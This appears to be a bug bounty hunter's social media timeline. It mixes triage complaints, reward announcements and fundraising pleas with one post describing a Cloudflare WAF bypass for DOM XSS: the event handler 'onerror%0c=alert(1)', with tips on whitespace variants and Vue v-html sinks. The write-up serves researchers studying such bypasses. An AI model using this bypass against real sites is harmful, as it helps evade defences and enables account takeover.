Xiety

If you share this or donate you will have infinite bug bounty luck! You guys are helping my nana <3 gofund.me/06479fa2a #bugbounty

Just got a reward for a vulnerability submitted on @yeswehack -- Use of Unmaintained Third Party Components (CWE-1104). yeswehack.com/hunters/xiety #YesWeRHackers

Woke up this morning thinking "It's Thursday — no XSS reported this week... ... what will I do for PAYLOAD OF THE WEEK?" Started on a new target last night. Woke up VERY early and found this: Confirmed DOM XSS → theoretical ATO (still working on that!). Cloudflare WAF bypassed. The bypass is the interesting part: onerror=alert(1) → 403 onerror%0c=alert(1) → 200 Note: one character: %0c is a form feed. Cloudflare matches onerror= literally. The HTML spec treats form feed as whitespace — so onerror\x0c= is a valid event handler that CF never sees. Once past the WAF, the XSS chain was wide open: - URLSearchParams → Vuex store → v-html / innerHTML - No sanitisation at any step. - CSP was report-only — never enforced, so nothing blocked execution. - Confirmed in all browsers. No auth required. - Single link from the browser. Sanitised explanation in the image - plus time-stamped ALERT from just moments ago. You're watching XSS live!! Report to h1 almost drafted but on hold as I look to escalate to full ATO. Things worth adding to your methodology: 1. When a WAF blocks your event handler, try whitespace variants before moving on. Form feed, vertical tab, null byte. CF won't always catch them. 2. Vue apps using v-html are worth tracing. It compiles straight to innerHTML. Follow the data into the store. 3. If you see Content-Security-Policy: ... report-only — that's not protection. That's a log file 😄

My nana is trying to win the fight against stage 4 cancer. Anything helps. Share or a donation helps us out tremendously. gofundme.com/f/Help-Us-Make…

@EvanKlein338226 Everything I submit rn is getting closed

@_Xiety The "informative" mark on valid IDORs is the most frustrating part of this game. Always ask for clarification on scope and push back with clear impact. If they can't articulate why it's not a real issue, escalate.

Great way to start the day with a Critical IDOR as Informative!

@EubardWells @_MrPlanB @yeswehack I might have too lol

@_Xiety @_MrPlanB You have to mention them about your @yeswehack profile coz 0_day_pilot might have added your profile to AI sllop groups and he keeps doing it for many researchers where they blindly close submission as "N/A"

@Cachorroexausto Tempting some days.

@_Xiety A million-dollar payout on the black market, or a $0 bounty. Your move.

@_MrPlanB Just a better way to say get scammed, We will fix it and not reward lol used to it.

@_Xiety An exceptional as known issue is wild 🥲

@_MrPlanB “Known issue” but its not written in the known issues on the program so Im confused

@_Xiety Reason of closure?

@EubardWells @intigriti Too bad my findings are all manual!

@_Xiety @intigriti Is that my newbie acquaintance 0_day_pilot or commanderstax. They are living in illusions due to huge AI slop. Even this world is a simulation for them!!! No wonder They watched matrix movie series too much and still got high !!! @intigriti

I have an endpoint where I can inject malicious content into a QR code. Inject and pre-fill messages to numbers which is a toll rate number I can set up. Also I can redirect to a malicious site, make the user call a number etc. Impactful?! @intigriti Triage says no. LOL

@intigriti dm

To my bug bounty/infosec family: My Nana was hit with a Stage 4 lung cancer diagnosis. It’s aggressive and the costs are stacking up fast. I’m grinding to cover what I can, but I’m asking for a hand. please consider sharing please! gofund.me/452ed087e

I have an endpoint that allows you to download a users Privately listed video not *youtube* btw. Just by visiting the link. Improper Access

@s4dmach1ne Not toxic at all, If you lack and don’t submit someone else is going to. Won’t always be there waiting for you

@_Xiety the FOMO is real and that mindset is toxic imo

Each day you decide to miss on hunting for bugs increases your chances of dupes. #Bugbounty

@5hady_ @intigriti Okay

@_Xiety @intigriti No he is not And btw he is a good triager

Is the 0day_pilot on @intigriti a bot? They just closed a html injection and IDOR leaking PII as information/ Closed lmao

@intigriti why is oday_pilot closing impactful bugs? PII disclosure + html injection? Makes me want to rethink your platform

@antoniusblock23 @intigriti Must be a bot lol it was impactful bugs

@_Xiety @intigriti Same happened to me just few hours ago